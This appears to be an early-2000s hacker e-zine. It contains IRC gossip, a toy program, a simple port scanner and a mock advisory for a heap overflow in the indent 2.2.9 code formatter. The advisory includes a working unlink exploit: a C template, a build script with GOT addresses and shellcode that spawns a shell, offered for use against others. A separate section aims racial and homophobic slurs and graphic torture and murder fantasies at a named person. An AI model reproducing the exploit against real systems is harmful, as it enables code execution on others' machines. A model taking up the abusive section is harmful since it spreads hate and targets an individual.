¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ ::ÆÆÆ[www.blackhat.cx]ÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆ:: ____________ --)-----------|____________| ,' ,' -)------======== ,' ____ ,' `. `. ,' ,'__ ,' `. `. ,' ,' `. `._,'_______,'________________[ vol.2 <=> issue#2 ] __________.____ _____ _________ ____ __.__________.___ _______ ___________ \______ \ | / _ \ \_ ___ \| |/ _______ /| |\ \ \_ _____/ | | _/ | / /_\ \/ \ \/| < / / | |/ | \ | __)_ | | \ |___/ | \___| | \__/ /__| | \_| \ |______ ________ ____|__ /\______ _____|__ __________\___\____|_______________/ \/ \/ \/ \/ \/ @blackhat.cx .-"" |=========================== ______________ |--------------------------------- "-...l_______________________ | |' || |_]__ | [`-.|__________ll_| |----- www.blackhat.cx -------- ,' ,' `. `. | (c) The b-zine corp. | ,' ,' `. ____`. ------------------------------- -)---------======== `. `.____`. __ `. `. / /\ `.________`. _ / / \ --)-------------|___________| ,-- / /\/ / \ -, | ,/ / \/ / |----> the table of contents ,---| \ \ / |---------------------------------------------------------------, | `-- \ \ / -----' "Trying is the first step towards failure" | `\`*_' - Homer J. 
Simpson | \__________________________________________________________________________' | |:--+-- 0x01 -+Welcome -------------------------------------------------+------------- |:--+-- > 1ntroduct1on |:--+-- > About th4 b-z1ne st4ff |:--+-- > cont4ct uz |:--+-- > gr3etz && hatez |:--+-- 0x02 -+Pr0ix Payback time --------------------------------------+------------- |:--+-- > 10 reasons why pr0ix is a retard |:--+-- > 10 things to d0 wit pr0ix |:--+-- 0x03 -+ju4erz m4dn3zz ------------------------------------------+------------- |:--+-- > from /home/shev |:--+-- 0x04 -+b4d n3wz ------------------------------------------------+------------- |:--+-- > 1nd3x |:--+-- > d1v1n31nt wh1t3h4t |:--+-- 0x05 -+Art1cl3z ------------------------------------------------+------------- |:--+-- > Winnie The Pooh Hacking Squadron |:--+-- > 4nd th3 g00d13 |:--+-- 0x06 -+Thank you and good bye ----------------------------------+------------- |:--+-- > outro `-------------------------------------------------------------------------------------' ::ÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆ[www.blackhat.cx]ÆÆÆ:: --+-- 0x01 -+Welcome --------------------------------------+-------------------------- > 1ntroduct1on [By: uNkl m0lti13hm0r] Hi im uNkl m0lti13hm0r and im the poor jew that fell for lkm's 'ill-let-you-touch-my-penis-if-you-write-all-the-boring-stuff-for-my-ezine'-trick. Few wanted to write something for our magazine... well actually many, but we dont want any more of sinister's ghey cookie recipes now do we? :< well... after a wh0le lotta crap, we finally got this god-damn thing ready!@$#... unfortunately i have some sad newz before you start reading this orgasmic collection of eleiht2tehmaximewm-ezine ..... this will be the last issue of the black-hat zine ever. im sorry, but we are basically to damn lazy. 
we've had plenty of nice texts (EXCLUDING EVERYTHING THAT SINISTER MADE) in the latest zines, and we are going to try to make this one the zine you will remember us for. now i wont bore you anymore, read on... yours sincerely, uNk0L m0LtiEhm0rrrrr. > About th4 b-z1ne st4ff [By: st4ff] [ lkm - igl00 m4zter from the v0lc4n0 island ] [ sp4c3 c0wb0y - MENTALLY DAMAGED BY HITLERS SHOWERS ] [ uNkl m0lti13hm0r - teh h1mc0k3 wreckage ] [ doktur an0nymou$ - y0 y0u d0nt kn0w him f0 sh0! ] [ schwartzn1gg3r - t3h b1tch fr0m w3zt s1de LA ] > cont4ct uz > gr3etz && hatez --+-- 0x02 -+Pr0ix Payback time --------------------------------------+--------------- > 10 reasons why pr0ix is a retard [By: uNkl m0lti13hm0r] hi! i assume you all have heard of the publiq enemy pr0ikz/whatever. pr0ix is a dumb #dorknet/hack.cock.zad/ whatever niger who likes to fuck dead animals. teh blakhats h8 pr0ix because: #1 - Pr0ix is gay, and he will try to have sex with you in your ass if you even pretend to be his friend. #2 - Pr0ix leeches exploitz to g0vb0i who immediately uploadz 2 hack.co.za with some lame php script he got on the web 5 secs b4 he emails it to ofir@securityfocus.com. luckily, pr0ix+govb0i r so fucking stupid they cant even paste an email witout spelling errorz so none of the emails ever gets thru. #3 - pr0ix is fat and dreamz about joining the romanian xf0rze. #4 - hey dvdman lets packet the phc some more!@!@!@ #5 - yo guys i finally got rpc-dcom autorooter to execute correctly! #6 - pr0ix teeth+armpits smellz worse then divineint's defecation #7 - pr0ix gave a blowjob 2 dianora 4 sp00f #8 - pr0ix sweat smell funny :< #9 - his nick has a number in it #10 - he's italian > 10 things to d0 wit pr0ix [By: uNkl m0lti13hm0r] #1 - make a monkey with the ebola virus bite pr0ix dick off and then he will sit in there and bleed without f00d or water for a week or two while waiting for the death of the virus. if he bleedz to fast we'll just giv him a blood transfer. 
#2 - we cud take a giljotine and ch0p off hiz fingers/c0q/toez and leave him in a smaaaalll room, and wait for the blood go up so much he could swim in it, then we shoot him in his fuqing kneecap wit a shotgun and watch him drown in his own blood wit the videocameraz we mount in the room\ #3 - we take a chainsaw and stick it down his fuqn throat and watch his whole body get sawed in a 100 piecez while the ch41ns4w goesz all crazy #4 - slit his m0thafukn throat wit an openbsd cd then send the cd back to theo, asking for a refund and watch theo get HIV #5 - lock him in a room and play h4ppy tr3e fri3nds songs all nights and wait till cleavez his own skull wit the axe we accidentally leave in the room #6 - we pour around 50 litres of nap4lm on him and throw cigarettez on him #7 - we d0 it the 0ld skewl way: we hang him on the streetz (after about 5 hourz wit stun gun electrocution+chinese torture of courze) #8 - we hammer his ballz with a b4d4zz sledgehamm0r and then we pour VX gas down his throat and watch his skin melt, and then we laugh as he spits up hiz own fuqn guts HEH #9 - we take a rope around his non existant c0q and the other end after a car.. w3 start the car and drag him after making his hole skin get burnt off.. if hes still alive we beat his fuqin head in wit an aliminium baseball bat #10 - gather 200 blaqh@z and make them all shit down pr0ixz throat untill he dies 2 --+-- 0x03 -+ju4erz m4dn3zz ------------------------------------------+--------------- > from /home/shev y0 look @ th4t sc0ttish sk1llz -bash-2.05b$ cat diss.c /* diss.c by shev /alias diss { exec -o ~/code/diss -d } /alias uberdiss { exec -o ~/code/diss -u } /alias counterdiss { exec -o ~/code/diss -c } wh00hahshit! 
- #jEWcREW dissware dedicated to leet.c, because it's a legend */ #include #include int main(int argc, char **argv) { char c; while((c = getopt(argc, argv, "duchebag"), 0x00) != -1) { switch(c) { case 'd': //diss printf( "\e[1;33mD \e[1;32mI \e[1;31mS \e[1;36mS \e[1;34m!@#~% \n"); break; case 'u': //ubderdiss printf( "\e[1;33mU \e[1;32mB \e[1;31mE \e[1;36mR \e[35m- " "\e[1;33mD \e[1;32mI \e[1;31mS \e[1;36mS \e[1;34m!@#~% \n"); break; case 'c': //counterdiss printf( "\e[1;33mC \e[1;32mO \e[1;31mU \e[1;36mN \e[1;33mT \e[1;32mE \e[1;31mR \e[1;36m- " "\e[1;33mD \e[1;32mI \e[1;31mS \e[1;36mS \e[1;34m!@#~% \n"); break; case 'h': usage(); default: usage(); } break; } exit(0); } int usage() { fprintf(stderr, "diss.c v0.1 by shev\n" "Usage: ./diss [OPTION]\n" "* -d:\tdiss!\n" "* -u:\tuberdiss!\n" "* -c:\tcounterdiss!\n" "* -h:\tthis help!\n"); exit(1); } -bash-2.05b$ cat shevscan.c /* A simple TCP portscanner By shev [shev@somehost.org] [1999] // shev, somehost.org was not reg'd until the year 2002! 
Shouts to #mafia / #phsc // are you trying to make out you've been coding for 4 years ?:| */ #include #include #include #include #include #include #include #include #define MAXPORT 1024 int main(int argc, char **argv) { int i, MAX, sock; struct sockaddr_in adr_inet; struct servent *port; struct hostent *ip; printf( "-----------------------------\n" "| TCP portscanner |\n" "| by shev [shev@somehost.com] |\n" "-----------------------------\n", argv[0]); if (argc < 2) { fprintf(stderr, "Usage: %s [MAX PORT]\n", argv[0]); exit(EXIT_FAILURE); } if (argv[2] != 0x0) { MAX=atoi(argv[2]); } else { MAX=MAXPORT; } ip = gethostbyname (argv[1]); if(!ip) { printf("error: could not resolve hostname.\n"); exit(EXIT_FAILURE); } printf( "\nscanning:\t%s\n" "maxport:\t%d\n\n" "results:\n" "\t\tport\tservice\n", argv[1], MAX); bzero(&adr_inet,sizeof(adr_inet)); adr_inet.sin_family = AF_INET; bcopy (ip->h_addr, (char *) &adr_inet.sin_addr, ip->h_length); for(i = 0; i < MAX; i++) { if (( sock = socket(AF_INET,SOCK_STREAM,0) ) < 0 ) { perror("socket() "); exit(1); } adr_inet.sin_port = htons(i); if (connect(sock,(struct sockaddr *) &adr_inet,sizeof(adr_inet)) == 0) { port = getservbyport(ntohs(i), "tcp"); if(port != NULL) printf("\t\t%d\t%s\n", i, port->s_name); if (port == NULL) printf("\t\t%d\tUNDETERMINED\n", i); } close(sock); } printf("\nScanning finished!\n"); } -bash-2.05b$ --+-- 0x04 -+ b4d n3wz -----------------------------------------------+--------------- > H34dl1n3z [By: doktur an0nymou$ && schwartzn1gg3r ] Ac00rd1ng to: doktur an0nymou$ <-> ducer the polish hacker lost his ircs account for smbclienting half of the world from ircs shell servers. 
<-> Ac00rd1ng to: doktur an0nymou$ <-> ADM is getting even more active, prepare for a takeover !@# <-> Ac00rd1ng to: doktur an0nymou$ <-> shiftee the retired hacker (ircer now), lost his access to logos.relcom.ru by the cause of cracking too much channel keys with his script <-> Ac00rd1ng to: doktur an0nymou$ <-> sionide learnt how to drive a go-cart roflol <-> Ac00rd1ng to: doktur an0nymou$ <-> pr0ix the prince of pranks, now has access to CHANFIX database and already took over a lot big channels, wonder when ircops gonna realise that his a scumbag <-> Ac00rd1ng to: doktur an0nymou$ <-> halvar and calvados are now officially girlfriendqs for being able to drink themselves under the floor, even tho calvados also loves ParaBytes, who schooled him on win32asm <-> Ac00rd1ng to: doktur an0nymou$ <-> zip of #mafia got caught for hacking wait3rs #darknet access in the botnet. his hdd is now completely full with messages like "h4ck.c0.z4 0wnz u l1l f00l" <-> Ac00rd1ng to: doktur an0nymou$ <-> north_ now has the worlds ever sucky sendmail exploit <-> Ac00rd1ng to: doktur an0nymou$ <-> the fluffy bunny is back online, prepare for newer defaces (pH33R) <-> Ac00rd1ng to: doktur an0nymou$ <-> om the israeli hacker (not yet a kiddie actually) is trying to hack a NATed box via its gateways, he already tried mission hackit with nmap, but had no luck yet <-> Ac00rd1ng to: schwartzn1gg3r <-> DaStand is happy now.. he recently goes out drinking with his hacker friends (scrippie, jj, etc). they gave him a so-sophisticated-looking-like exploit, he tried to compile but it took him 3 days to fix and compile, after that he is reinstallnig his home box. 4nd now he is the infamous phC h4cker sky- s0 w4tch out for pHC-k3nny.c <-> Ac00rd1ng to: doktur an0nymou$ <-> americas (in!)famous hacker (dumbass fuck) PEN is now ddosing his friends for no reason. Actions mirroring his skills are like he is not able stop his floodnet once he started it. 
<-> 1 > d1v1n31nt wh1t3h4t [by: schwartzn1gg3r] 08:39 -!- aprodite [-aprodite@0xbadc0ded.org] has joined #blackhat 08:40 < aprodite> sup guys 08:40 <@censored> nothing important whitehat-boy 08:41 <@censored> hmm 08:41 <@censored> :P 08:43 < aprodite> haha whitehat b0y 08:43 < aprodite> =] 08:44 < aprodite> suo mcbethy long time no see/type 08:44 <@censored> :) 08:44 <@censored> i know you under other handle ? -aprodite@0xbadc0ded.org (stealth) 08:44 -!- Irssi: Starting query in stealth with aprodite 08:44 been ages...sup? 08:44 u know who i am rite 08:44 not really 08:44 o 08:45 divineint =] 08:45 oh 08:45 so you are whitehat now ? 08:45 0xbadc0ded.org is whitehat group 08:45 obviously not why? 08:45 oh 08:45 l'm still pure black of course 08:45 hhehee 08:46 u don't get much darker 08:46 hehe 08:46 you are badc0ded.org member now ? 08:46 neh 08:46 just got a shell no bigge =] 08:47 y what have u against them? 08:47 not much.. i just hate them :P 08:47 hahahaa 08:47 funky =] 08:47 anyways their nice dudes if u get to knwot hem after a while 08:48 still trading on darknet ? 
08:48 anyways quit bitching about my host :P 08:48 naturally 08:48 i hat your host 08:48 and many other places of course 08:48 hate 08:48 hehe 08:48 well get me a shell on phiral then 08:48 matrix runs it or what 08:49 yep 08:49 o 08:49 proably sniffs you long time =] 08:49 hhee 08:49 i don't care 08:49 o i would care 08:49 anyways so sup whats been going on 08:50 not much 08:50 haha i can't belive anyone accusing me of being whitehat hahehehe 08:50 coding & working 08:50 *lol* 08:50 08:50 not much 08:50 08:50 haha i can't belive anyone accusing me of being whitehat hahehehe 08:50 08:50 coding & working 08:50 08:50 *lol* 08:50 ah the usual sh1t eh 08:50 shit 08:51 :P 08:51 heh 08:51 wrong mouse move 08:51 :) 08:52 maybe you are not white 08:52 but badc0ded obviously is 08:52 badc0ded.org 08:53 wow 08:53 they have phiral.com in links section 08:53 :) 08:57 <@othercensored> re 08:57 <@othercensored> censored;] 08:57 <@censored> yo othercensored 08:57 <@censored> :) 08:57 <@othercensored> :> 08:58 <@censored> crucified 08:58 <@othercensored> ;] 08:59 <@othercensored> widze twoja twarz !! 08:59 <@othercensored> :D 08:59 <@censored> heh 09:00 <@othercensored> http://slashdot.org/article.pl?sid=00/12/22/0157229&mode=nocomment 09:00 <@othercensored> NSA linux;] 09:00 -!- aprodite [-aprodite@0xbadc0ded.org] has quit [BitchX-1.0c19 -- just do it.] 
09:01 <@censored> hum 09:01 <@othercensored> hm --+-- 0x05 -+ Art1cl3 ------------------------------------------------+--------------- > Winnie The Pooh Hacking Squadron [by: Winnie The Pooh Hacking Squadron] XXXX XX XX XXXX XX XX XXX XX XX XX XX XX XXXX XX XX XX XX XXXX XX XX XX XXX XX XX XX XXX XX XX XXX XX XX XXX XX XX XX XX XXXX XX XX XX XX XX XX X XX XX XXX XX XX XX XX XXX XX XX XXX XXXX XX XXX XXX XX XXX XXXX XXX XXXXX XX XXXXX XX XXXX XX XX XXX XXXXXXXX X XX XX.....XXXXX XX XX XX.......XXXXXXX XX XX XX XX............XXXXXXX XX XX XXX XX..X..............XXXXXX XXXXXXXXXX XXX....................XXXX XX XX........................XXXX XXXXX XX.............................XXXX..XX XX.................................XX..XX XX......................................XX XXX.......................................XX XXXX.........................................XX XXX...................X........................XX XXXXXXX...............X...........................XX XX XXXX...........XX..........................XX XX XXX.......XX............................XX XX XXX...XX..............................XX XX XXXX....XXXXXXXXXXXXXXXXXX..........XX XX XXXXXXXX XXXXXXXXXXXXXX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX X XXX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX X XX XX XX XXX XX X XXXX XX XXXX XX XX XX XX XXXXXX XX XX XXX XX XXXX XXX XX XX XXX XX XX XX XX XX XX XX XX XX XX XXXX XX XX XXX XX XX XXX XX XX XX XXX XX XX XXXXXXX XX XX XXX XXX XX XX XXX XXX XX XX XXX XX XXX XX XX XX XX XX XX XX XXX XX XX XX XX XX XXXXX XX XX XX XX XX XX XX XXXX XX XX XX X XX XXX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XXX XXX XX XXX XXXXX XXX XXX XXXXX . . .___.. .__ . | |*._ ._ * _ | |_ _ [__) _ _ |_ |/\||[ )[ )|(/, | [ )(/, | (_)(_)[ ) . . . __. . |__| _. _.;_/*._ _ (__ _.. . _. _|._. _ ._ | |(_](_.| \|[ )(_] .__)(_](_|(_](_][ (_)[ ) ._| | .__ , [__)._. 
 _ __ _ ._ -+- __ * | [ (/,_) (/,[ ) | _) * Software: indent Version: 2.2.9 Vulnerability: buffer overflow while parsing .c file Found date: Aug 2002 Release date: today you stupid whitehat boy Researchers: Winnie The Pooh Hacking Squadron Favourite food: whitehat soup [0] LICENSE 1) No whitehat whore can use this in his pseudo-security work 2) divineint can't trade exploit attached to this advisory on #darknet@efnet nor other lame channel (for people who don't know it yet - his new nick is illumanti(z), is he hidding ?!) 3) Every hacker can implement exploit for this vuln in his codes to protect them from script kiddies and whitehats. 4) WtPHS strongly encourage hackers to use this against whitehats. 5) WtPHS don't give a shit if you hurt yourself [1] INTRO indent is really fucking leet tool that improves appearance of C source code. It was designed to help people reading sources written by damn stupid and unskilled programmers like You Dong-Hun or Theo the Radt. It is really helpful nowadays because of that whores who think they are coders. Unfortunately the authors of indent also made their software vulnerable to a buffer overflow. [2] DETAILS handle_token_colon(...) is the vulnerable function. The buffer overflow occurs while parsing text (from .c file of korz) which indent treats as a label. It copies the whole 'label' into a 1000-byte buffer on the heap, without bounds checking. (Note for divineint-alike people: such an overflow can overwrite heap structures and, as a result, lead to arbitrary code execution). This is the vulnerable part of the handle_token_colon(...) function: for (t_ptr = s_code; *t_ptr; ++t_ptr) { *e_lab++ = *t_ptr; /* turn everything so far into a label */ } (Note for gorion(*)-alike people: this loop keeps copying until a NUL byte is found in the source string) (The loop advances e_lab on every byte and never compares it with the end of the label buffer; the fix is to check the remaining space, or grow the buffer, before each store.) [3] EXPLOITATION This section is needed for stupid people like divineint or Lorenzo Hernandez Garcia-Hierro (Good Lord! I feel like in south-american telenovel saing his name).
Smart people choose clear_buf_break_list() function to cause code execution. This function is executed just after our vulnerable loop, so we don't risk application crash. indent breaks source code and makes double-linked list (buf_break_list) of code parts. Mentioned function free()'s all buf_break_list entries. This double-linked list entries are allocated after 'labbuf' (e_lab points to labbuf) so we are able to overwrite it. Now exploitation is very easy. Overwrite free() GOT entry with and make clear_buf_break_list() loop run once again by setting 'prev' field of buf_break_st_ty struct to some readable value. Exploit for this vulnerability for indent 2.2.9 from slackware 9.0 is attached to this advisory. NOTICE!!!! QUIZ FOR KIDDIES: --------------------------------------------------------------------- This exploit have simple execve(shell) shellcode. What do you have to change to make this exploit useful ? --------------------------------------------------------------------- FIRST PERSON WHO SENDS US GOOD ANSWER WINS OpenSSH Buffer Management Vulnerability REMOTE EXPLOIT ... DON'T WAIT !! DO IT NOW! [4] EDUCATIONAL VALUE Whats educational here? One technique used in this exploit. Lets call FD = WHAT and BK = WHERE-8. People with IQ > 75 knows that unlink() will do *(WHAT+0xc)=(WHERE-8) except *((WHERE-8)+8) = WHAT. If we point WHAT to NOPs before our shellcode, unlink() will change few of our NOPs to something else. Executing this 'somethingelse' will probably crash our application. 
It looks like this: Before unlink(): (gdb) x/20i 0x805b440 0x805b440: nop 0x805b441: nop 0x805b442: nop 0x805b443: nop 0x805b444: nop 0x805b445: nop 0x805b446: nop 0x805b447: nop 0x805b448: nop 0x805b449: nop 0x805b44a: nop 0x805b44b: nop 0x805b44c: nop 0x805b44d: nop 0x805b44e: nop 0x805b44f: nop 0x805b450: nop 0x805b451: nop 0x805b452: nop 0x805b453: nop (gdb) x/x 0x8058dc8 0x8058dc8 <_GLOBAL_OFFSET_TABLE_+144>: 0x40019f52 After unlink(): (gdb) x/x 0x8058dc8 0x8058dc8 <_GLOBAL_OFFSET_TABLE_+144>: 0x0805b440 (gdb) x/20i 0x805b440 0x805b440: nop 0x805b441: nop 0x805b442: nop 0x805b443: nop 0x805b444: nop 0x805b445: nop 0x805b446: nop 0x805b447: nop 0x805b448: nop 0x805b449: nop 0x805b44a: nop 0x805b44b: nop 0x805b44c: rorb $0x90,0x90900805(%ebp) 0x805b453: nop 0x805b454: nop 0x805b455: nop 0x805b456: nop 0x805b457: nop 0x805b458: nop 0x805b459: nop Next call to free() will jump to 0x805b440. If execution flow will reach 0x805b44c, program will crash at this instruction. Solution is simple, however WtPHS don't remember anybody describing it before, so ... 
here it is: Instead of NOPs you can use relative jmp's like this: Before unlink(): (gdb) x/20i 0x805b440 0x805b440: jmp 0x805b44a 0x805b442: jmp 0x805b44c 0x805b444: jmp 0x805b44e 0x805b446: jmp 0x805b450 0x805b448: jmp 0x805b452 0x805b44a: jmp 0x805b454 0x805b44c: jmp 0x805b456 0x805b44e: jmp 0x805b458 0x805b450: jmp 0x805b45a 0x805b452: jmp 0x805b45c 0x805b454: jmp 0x805b45e 0x805b456: jmp 0x805b460 0x805b458: jmp 0x805b462 0x805b45a: jmp 0x805b464 0x805b45c: jmp 0x805b466 0x805b45e: jmp 0x805b468 0x805b460: jmp 0x805b46a 0x805b462: jmp 0x805b46c 0x805b464: jmp 0x805b46e 0x805b466: jmp 0x805b470 After unlink(): (gdb) x/10i 0x805b440 0x805b440: jmp 0x805b44a 0x805b442: jmp 0x805b44c 0x805b444: jmp 0x805b44e 0x805b446: jmp 0x805b450 0x805b448: jmp 0x805b452 0x805b44a: jmp 0x805b454 0x805b44c: rorb $0xeb,0x8eb0805(%ebp) 0x805b453: or %ch,%bl 0x805b455: or %ch,%bl 0x805b457: or %ch,%bl (gdb) x/10i 0x805b454 0x805b454: jmp 0x805b45e 0x805b456: jmp 0x805b460 0x805b458: jmp 0x805b462 0x805b45a: jmp 0x805b464 0x805b45c: jmp 0x805b466 0x805b45e: jmp 0x805b468 0x805b460: jmp 0x805b46a 0x805b462: jmp 0x805b46c 0x805b464: jmp 0x805b46e 0x805b466: jmp 0x805b470 This way we jumped over shitty instruction. These jmps will lead execution flow to our shellcode, but to be sure that no jmp will jump into middle of shellcode you have to put few (at least 8) NOPs before shellcode. Than last jmp will jump to NOPs and than shellcode will be executed properly. [5] IMPACT Possible impact is quite big. For example companies and software developers that are terrified because of their software is damn shitty (Cisco, Apache, OpenBSD, Linux Kernel first come to our mind) could implement exploit for this vuln into their source codes to make hackers life difficult. [6] FLAMES, SHOUTOUTS and FINAL NOTES *) no, divineint, you can't get our juarez - stop begging for it biatch *) no, Stefan Esser, you can't steal our juarez and public it as your own, because you are to stupid to own us. 
*) shoutouts to our brotherly squad - Mickey Mouse Hacking Squadron *) shoutouts to PHC for terrorizing whitehats and full-disclosure *) recent OpenSSH vulnerability is exploitable *) greetings to Lorenzo Hernandes Garcia-Hierro for making us laught on the floor while reading his posts. *) kudos to Alan Alexander Milne (R.I.P - 1956) [7] OUTRO the end... > 4nd th3 g00d13 [by: Winnie The Pooh Hacking Squadron] $ cat winnie-template.c int main(int argc, char **argv) { printf("W1nN13 Th3 p00H H4ck1n6 SqU4dr0n pR0udlY Pr3z3n7z:\n" "0-day P0f f0R indent-2.2.9 bUFF3r oV3rFl0W vU1n3r4b1l1ty\n"); asm ( "nop\n" "nop\n" "nop\n" "nop\n" "nop\n" "jmp continue\n" ".string \"JPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS\"\n" ".string \"cccddddeeeeffffgggghhhhiiiijjjjkkkkllll\"\n" "continue:\n" "nop\n" "nop\n" :); return 0; } $ cat prepare.sh #!/bin/sh # these addresses are working on indent 2.2.9 from # slackware 9.0 # what_to_write # # it should be 2bytes aligned because it have to # point to one of \xeb from jmps. 
If it points # to \x08 - exploitation will fail FD=`echo -e "\x40\xa4\x05\x08"` # where_to_write-0x8 # # it is good idea to point it to free() field in GOT BK=`echo -e "\xc0\x7d\x05\x08"` # change all 'JP' to \xeb\x08 (relative jmp to $+8 bytes) sed -e "s/JP/`echo -e \"\xeb\x08\"`/g" winnie-template.c > temp.c # change all 'N' to \x90 (NOP) sed -e "s/NNNNNNNNNNNNNNN/`echo -e \"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\"`/" temp.c > winnie.c # change 'S's to shellcode sed -e "s/SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS/`echo -e \"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\/bin\/sh\"`/" winnie.c > temp.c # exploit with this shellcode is quite useless, because # it is simple execve(shell) shellcode. If you want to # change shellcode, first prepare winnie-template.c - # change 'SSSS...' len to len of your new shellcode, # but len of whole 'JP...NNN...SSS' should remain the same. # You can remove few 'JP's. You have to leave few NOPs # before shellcode, because one of jmp's will land in them # (this is to be sure that no jmp will land in the middle # of shellcode. When you changed template, change sed line # above - change 'SSSS...' len and shellcode. 
# change 'dddd' 'eeee' 'ffff' to 0xfffffffc (-4) sed -e "s/dddd/`echo -e \"\xfc\xff\xff\xff\"`/" temp.c > winnie.c sed -e "s/eeee/`echo -e \"\xfc\xff\xff\xff\"`/" winnie.c > temp.c sed -e "s/ffff/`echo -e \"\xfc\xff\xff\xff\"`/" temp.c > winnie.c # change 'gggg' to FD (what_to_write) sed -e "s/gggg/$FD/" winnie.c > temp.c # change 'hhhh' to BK (where_to_write-8) sed -e "s/hhhh/$BK/" temp.c > winnie.c # 'iiii' is prev_size, but we don't need to change it # Left it untouched # change 'jjjj' to 0xfffffff1 (size field, pointing to these # three (-4)) sed -e "s/jjjj/`echo -e \"\xf1\xff\xff\xff\"`/" winnie.c > temp.c # change 'llll' to some readable value (on stack for example) # it is 'next' field of overwritten buf_break_list struct sed -e "s/llll/`echo -e \"\x40\xff\xff\xbf\"`/" temp.c > winnie.c rm temp.c $ --+-- 0x06 -+Thank you and good bye ----------------------------------+------------- > outro [by: lkm] Ok to make long story short, i've had enough of "irc" it's becoming useless 4 me atleast, so i'm just here to say goodbye and i sure hope you all have good life! Peace out LKM